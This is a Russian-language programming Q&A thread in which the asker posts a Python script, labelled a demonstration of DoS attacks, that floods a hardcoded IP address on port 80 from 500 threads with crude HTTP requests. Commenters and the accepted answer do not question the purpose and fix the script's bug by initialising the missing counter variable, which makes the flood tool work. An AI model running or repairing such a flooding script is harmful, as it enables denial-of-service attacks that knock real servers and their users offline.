# Ошибка во время исполнения кода

Tags: python

Выдает ошибки при отправке пакетов.

```
import threading
import socket

target = '95.163.181.222'
port = 80
fake_ip = '182.253.21.34'


# показательная версия работы DoS атак

def attack():
    while True:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target, port))
        s.sendto(("GET /" + target + "HTTP/1.1\r\n").encode('ascii'), (target, port))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
        s.close()

        global already_connected
        already_connected += 1
        if already_connected % 500 == 0:
            print(already_connected)


for i in range(500):
    thread = threading.Thread(target=attack)
    thread.start()
```

[image: введите сюда описание изображения]

Comment: Ну да, вы пытаетесь использовать несуществующую переменную already_connected, больше тут сказать нечего

Comment: Понял, благодарю то что указали на ошибку.

Answer (score 2, accepted):

Начала кода должно выглядит так:

```
import threading
import socket

target = '95.163.181.222'
port = 80
fake_ip = '182.253.21.34'
already_connected = 0
```

Comment: Спасибо большое.

Comment: @Zekoy если вам мой ответ помог то примите его(галочка слева от ответа)